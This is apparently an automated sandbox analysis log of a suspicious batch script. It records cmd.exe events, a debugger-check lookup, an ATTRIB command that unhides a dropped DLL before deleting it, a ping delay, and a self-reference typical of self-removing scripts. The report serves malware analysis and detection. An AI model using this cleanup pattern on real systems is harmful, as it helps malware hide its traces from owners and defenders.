Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\BGC6u8Oy yXGxkR\Desktop	1	Fn
Environment	Get Environment String		1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x765cac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x765e2732	1	Fn
File	Get Info	filename = "C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat", type = file_attributes	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x764f0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x76512102	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x76513352	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x76513825	1	Fn
File	Create	filename = C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 8191, size_out = 245	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 8191, size_out = 236	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 33	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 6	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 55	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\attrib.exe, os_pid = 0xce0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 8191, size_out = 174	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 33	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 3	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 52	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
File	Get Info	filename = C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\BGC6U8~1\AppData\Local, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll, type = file_attributes	1	Fn
File	Delete	filename = C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 8191, size_out = 118	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 33	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 4	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 16	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\PING.EXE, os_pid = 0xce8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 8191, size_out = 97	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 33	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 3	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 54	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 4	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 8	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 8191, size_out = 27	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 33	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 7	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 9	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
File	Get Info	filename = cmd.exe, type = file_attributes	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xd04, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 8191, size_out = 10	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 33	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 3	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 5	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
File	Get Info	filename = %0, type = file_attributes	2	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 52	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 8191, size_out = 0	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 8191, size_out = 0	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #24: attrib.exe

Information	Value
ID	#24
File Name	c:\windows\system32\attrib.exe
Command Line	ATTRIB -h -s "C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll"
Initial Working Directory	C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor	Start Time: 00:00:51, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:24
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xce0
Parent PID	0xcc4 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x CE4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000100000	0x00100000	0x0010ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000110000	0x00110000	0x001d7fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001f0000	0x001f0000	0x0022ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000003a0000	0x003a0000	0x0049ffff	Private Memory	Readable, Writable	Region Actions Download Dump
attrib.exe	0x00730000	0x00736fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ulib.dll	0x6ebc0000	0x6ebdcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x756f0000	0x75708fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75710000	0x757b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x764f0000	0x7658ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Process #25: ping.exe

(Host: 23, Network: 1)

Information	Value
ID	#25
File Name	c:\windows\system32\ping.exe
Command Line	Ping 127.0.0.1 -n 3
Initial Working Directory	C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor	Start Time: 00:00:51, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:24

OS Process Information

Information	Value
PID	0xce8
Parent PID	0xcc4 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x CEC 0x CF0 0x CF4 0x CF8

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x00187fff	Pagefile Backed Memory	Readable	Region Actions
